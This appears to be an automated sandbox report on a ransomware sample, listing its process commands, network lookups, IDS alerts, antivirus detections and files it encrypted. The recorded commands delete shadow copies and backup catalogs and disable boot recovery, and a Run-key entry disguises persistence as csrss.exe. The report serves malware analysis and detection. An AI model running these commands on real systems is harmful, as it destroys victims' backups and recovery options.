Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 10, 2021, 10:33 a.m. | Aug. 10, 2021, 10:38 a.m. |
-
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
2816 -
-
WMIC.exe wmic shadowcopy delete
3048
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
2844 -
cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
2256 -
-
vssadmin.exe vssadmin delete shadows /all /quiet
2648
-
-
-
WMIC.exe wmic shadowcopy delete
2968 -
vssadmin.exe vssadmin delete shadows /all /quiet
360
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
www.geodatatool.com | 158.69.65.151 | |
geoiptool.com | 158.69.65.151 | |
iplogger.org | 88.99.66.31 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49165 -> 158.69.65.151:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49169 -> 158.69.65.151:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49168 -> 158.69.65.151:80 | 2015500 | ET POLICY Geo Location IP info online service (geoiptool.com) | Potential Corporate Privacy Violation |
TCP 192.168.56.102:49164 -> 158.69.65.151:80 | 2015500 | ET POLICY Geo Location IP info online service (geoiptool.com) | Potential Corporate Privacy Violation |
TCP 192.168.56.102:49171 -> 88.99.66.31:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49165 158.69.65.151:443 |
C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA | OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com | e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f |
TLSv1 192.168.56.102:49169 158.69.65.151:443 |
C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA | OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com | e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f |
TLSv1 192.168.56.102:49171 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
section | .code |
section | .rdatau |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://geoiptool.com/ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://www.geodatatool.com/ |
request | GET http://geoiptool.com/ |
request | GET http://iplogger.org/1L3ig7.gz |
request | GET https://www.geodatatool.com/ |
request | GET https://iplogger.org/1L3ig7.gz |
domain | geoiptool.com |
file | C:\Users\test22\AppData\Local\Temp\~temp001.bat |
cmdline | "C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat |
cmdline | "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete |
cmdline | "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet |
cmdline | "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures |
cmdline | "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no |
cmdline | wmic shadowcopy delete |
cmdline | "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet |
wmi | SELECT * FROM Win32_ShadowCopy |
cmdline | "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete |
cmdline | wmic shadowcopy delete |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe | reg_value | "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start |
command | "c:\windows\system32\cmd.exe" /c bcdedit /set {default} recoveryenabled no |
command | "c:\windows\system32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures |
cmdline | vssadmin delete shadows /all /quiet |
cmdline | wmic shadowcopy delete |
cmdline | vssadmin delete shadows /all /quiet |
cmdline | "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet |
Bkav | W32.AIDetect.malware2 |
Lionic | Trojan.Win32.Solmyr.l!c |
Elastic | malicious (high confidence) |
FireEye | Generic.mg.de904e0d5b71c0c3 |
McAfee | Artemis!DE904E0D5B71 |
Malwarebytes | Malware.AI.3183379480 |
Sangfor | Trojan.Win32.Save.a |
Alibaba | Ransom:Win32/generic.ali2000010 |
CrowdStrike | win/malicious_confidence_60% (D) |
BitDefenderTheta | Gen:NN.ZexaF.34058.zqW@a4t0QUoi |
Symantec | ML.Attribute.HighConfidence |
APEX | Malicious |
Paloalto | generic.ml |
Kaspersky | VHO:Trojan-Ransom.Win32.Vega.av |
NANO-Antivirus | Virus.Win32.Gen-Crypt.ccnc |
Avast | FileRepMalware |
Sophos | Mal/Generic-S |
McAfee-GW-Edition | BehavesLike.Win32.Generic.gh |
SentinelOne | Static AI - Malicious PE |
Microsoft | Trojan:Win32/Wacatac.B!ml |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
GData | Win32.Trojan-Ransom.Zeppelin.POEXBW |
Cynet | Malicious (score: 100) |
Cylance | Unsafe |
Tencent | Win32.Trojan.Raas.Auto |
Fortinet | W32/Buran.H!tr.ransom |
Webroot | W32.Solmyr |
AVG | FileRepMalware |
Cybereason | malicious.f70404 |
file | c:\program files (x86)\hnc\shared80\clipart\m_rest\rest_11.jpg.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\images\themes\dark\close.png.kd8eby0.192-37c-b0c |
file | C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Doc\Kor\PUBLIC\PUBL168.hwt |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\ita\fillsign.aapp.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\ukr\comments.aapp.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\teacher\teache32.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\student\studen17.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\account\accon029.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\tur\pages_r_rhp.aapp.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\draw\ft_foreign\talef_07.drt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\locale\ca_es\accessibility.cat.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\common80\imgfilters\gs\fonts\b018032l.pfm.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\walk-through\images\themes\dark\dc_share_upsell_2x.png.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\ui-strings.js.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\agmgpuoptin.ini.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\sky\forms_r_rhp.aapp.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\locale\sl_si\reflow.slv.kd8eby0.192-37c-b0c |
file | C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Doc\Kor\RELIGION\BUDDHISM20.hwt |
file | c:\program files (x86)\hnc\shared80\clipart\ec_math\mat033.png.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\rollconv.ps.kd8eby0.192-37c-b0c |
file | C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\CR_Humor\Humor_10.drt |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\diary\diary23.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\g2brun\jre7\lib\images\cursors\win32_copynodrop32x32.gif.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\resource\cmap\ucs2-90pv-rksj.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\clipart\m_economy\economy_20.png.kd8eby0.192-37c-b0c |
file | C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\DG_CommArrows\ArroG_35.drt |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\esp\richmedia_r_rhp.aapp.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\trade\trade101.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\enu\moretools.aapp.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hncdics\dictionary\english\prefixfilter.dat.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\house\house015.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\acroapp\hrv\actions_r_rhp.aapp.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\clipart\m_cooperation\cooperation_29.png.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\common80\imgfilters\imcd39.flt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\clipart\m_simple\simple_13.png.kd8eby0.192-37c-b0c |
file | C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Doc\Kor\PERSONAL\PERSO026.hwt |
file | c:\program files (x86)\g2brun\jre7\lib\zi\america\lima.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\scan-files\images\themeless\appstore\download_on_the_app_store_badge_zh_cn_135x40.svg.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\clipart\imagebullet\034.png.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\gs_cff.ps.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\locale\da_dk\annots.dan.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\ob-preview\js\nls\pt-br\ui-strings.js.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\calendar\calend29.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\fonts\yjhgini.hft.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\product\produ147.hwt.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\clipart\m_school\school_07.png.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\clipart\ec_science\sci010.png.kd8eby0.192-37c-b0c |
file | c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\product\produ107.hwt.kd8eby0.192-37c-b0c |